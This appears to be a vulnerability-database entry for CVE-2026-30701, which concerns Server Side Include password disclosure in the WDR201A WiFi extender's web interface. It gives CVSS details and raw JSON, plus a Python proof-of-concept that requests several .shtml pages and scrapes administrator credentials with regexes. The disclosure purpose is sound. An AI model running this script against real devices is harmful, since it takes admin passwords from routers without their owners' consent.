Security Vulnerability Report
CVE-2026-30701 CVSS 9.1 CRITICAL

CVE-2026-30701

Published: 2026-03-18 18:16:28
Last Modified: 2026-03-23 16:16:46

Description

The web interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) contains hardcoded credential disclosure mechanisms (in the form of Server Side Include) within multiple server-side web pages, including login.shtml and settings.shtml. These pages embed server-side execution directives that dynamically retrieve and expose the web administration password from non-volatile memory at runtime.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WiFi Extender WDR201A hardware version V2.1
WiFi Extender WDR201A firmware version LFMZX28040922V1.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-30701 PoC - WiFi Extender WDR201A Hardcoded Credential Disclosure
This PoC demonstrates the Server Side Include (SSI) credential disclosure vulnerability
"""
import requests
import re
import sys

TARGET_URL = "http://target-device-ip"
VULNERABLE_PAGES = [
    "/login.shtml",
    "/settings.shtml",
    "/status.shtml",
    "/wireless.shtml"
]


def extract_credential(content):
    """Extract potential credentials from SSI response"""
    # Common patterns for password exposure
    patterns = [
        r'password["\'\s:=]+([^<>"\'\s]+)',
        r'admin["\'\s:=]+([^<>"\'\s]+)',
        r'passwd["\'\s:=]+([^<>"\'\s]+)',
        r'value=["\']([^"\'<>]+)["\']',
    ]
    credentials = []
    for pattern in patterns:
        matches = re.findall(pattern, content, re.IGNORECASE)
        credentials.extend(matches)
    return list(set(credentials))


def check_vulnerability(target):
    """Check if target is vulnerable to CVE-2026-30701"""
    print(f"[*] Testing target: {target}")
    print(f"[*] CVE-2026-30701: WDR201A SSI Credential Disclosure\n")
    found_creds = []
    for page in VULNERABLE_PAGES:
        try:
            url = f"{target}{page}"
            print(f"[*] Requesting: {url}")
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200:
                creds = extract_credential(response.text)
                if creds:
                    print(f"[+] Potential credentials found on {page}:")
                    for cred in creds:
                        print(f" - {cred}")
                    found_creds.extend(creds)
        except requests.RequestException as e:
            print(f"[!] Error accessing {page}: {e}")
    if found_creds:
        print(f"\n[!] VULNERABLE: Found {len(found_creds)} potential credentials")
        return True
    else:
        print(f"\n[*] No obvious credentials found (manual inspection recommended)")
        return False


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    check_vulnerability(TARGET_URL)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30701", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:27.737", "lastModified": "2026-03-23T16:16:45.580", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The web interface of the WiFi Extender WDR201A (HW V2.1, FW LFMZX28040922V1.02) contains hardcoded credential disclosure mechanisms (in the form of Server Side Include) within multiple server-side web pages, including login.shtml and settings.shtml. These pages embed server-side execution directives that dynamically retrieve and expose the web administration password from non-volatile memory at runtime."}, {"lang": "es", "value": "La interfaz web del Extensor WiFi WDR201A (HW V2.1, FW LFMZX28040922V1.02) contiene mecanismos de divulgación de credenciales codificados de forma rígida (en forma de Server Side Include) dentro de múltiples páginas web del lado del servidor, incluyendo login.shtml y settings.shtml. Estas páginas incrustan directivas de ejecución del lado del servidor que recuperan y exponen dinámicamente la contraseña de administración web de la memoria no volátil en tiempo de ejecución."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": 
"https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "[email protected]"}, {"url": "https://www.made-in-china.com/showroom/yeapook/#:~:text=Established%20in%202015.%2CDistrict%2C%20Shenzhen%2C%20Guangdong%2C%20China", "source": "[email protected]"}, {"url": "https://mstreet97.github.io/security-research/iot/vulnerability-disclosure/cybersecurity/cve/2026/02/18/From-Blackbox-to-Whitebox-Multiple-CVEs-in-a-Consumer-WiFi-Extender.html", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}